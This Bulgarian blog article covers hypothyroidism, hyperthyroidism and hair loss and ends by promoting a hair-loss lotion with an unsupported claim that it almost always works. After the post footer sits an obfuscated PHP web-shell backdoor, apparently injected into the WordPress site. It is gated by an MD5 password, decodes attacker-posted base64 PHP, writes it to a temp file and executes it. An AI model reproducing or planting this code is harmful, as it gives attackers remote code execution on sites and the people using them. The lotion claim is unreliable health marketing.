Хипотиреоидизъм (занижена функция на щитовидната жлеза) | Косопад

Хипотиреоидизъм (занижена функция на щитовидната жлеза)

щитовидна жлезаМилиони хора по целия свят, повечето от които жени, страдат от заболявания на щитовидната жлеза. Въпреки че този орган е твърде малък (едва 20 – 25 гр.), от него в голяма степен зависи правилното функциониране на организма и физическото ни оцеляване. В случаите на хипотиреоидизъм се наблюдава сериозен спад в производството на хормони и това става причина за поява на редица медицински заболявания сред които косопад, променя се сърдечната честота, настроението спада.

Казано накратко, хормоните от нея са отговорни за всичко – вашия базален метаболизъм (скоростта на усвояване на кислород и енергия), растежа на косата и доброто състояние на кожата. Логично, когато има проблеми от подобно естество, заплахата от развиване на косопад е повече от реална.

Симптоми на хипотиреоидизъм

Заниженото количество произведени хормони може да доведе до наличие на цяла дузина симптоми, сред които необяснимо покачване на телесната маса, косопад, лесна умора, запек, депресия, невъзможност за концентрация. Що се отнася до състоянието на косата, то космите стават по – крехки и лесно раними, чупят се лесно. Тази болест се среща най – често при жени в над 50-годишна възраст, а в световен план от нея е засегнато около 5 % от цялото население на Земята.

На другия полюс стои хиперфункцията на щитовидната жлеза (твърде много хормони), която в медицината се нарича хипертиреоидизъм. Развиват се редица болестни състояния като базедова болест, токсичен аденом и др. Базедовата болест е в състояние да предизвика светкавично и необяснимо отслабване, голяма нервност и силна раздразнителност, диария, влажна и мазна кожа, мускулна слабост и изпъкване на очите, също води до косопад.

Заболяванията могат да бъдат установени със сигурност чрез извършване на кръвен тест, от който стават ясни нивата на хормоните. Ако са в повече явно има наличие на хипертиреоидизъм, а ако са по – малко на хипотиреоидизъм. В тези случаи се доверете на вашия лекар и никога не предприемайте самостоятелно лечение. По принцип се изписва хормонално лечение за нормализиране на концентрацията.

В случаите на косопад заради проблеми със щитовидната жлеза е много трудно да се въздейства, тъй като в някои случаи тялото решава да направи косата своя изкупителна жертва. Третирането с лосион против косопад (като „Ефект-2”) почти винаги дава положителни резултати.

щитовидна жлеза и косопад

10. септември 2013 20:47:13 от Косопад
Категории: Косопад – Статии | Етикети: , | Напишете Коментар

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}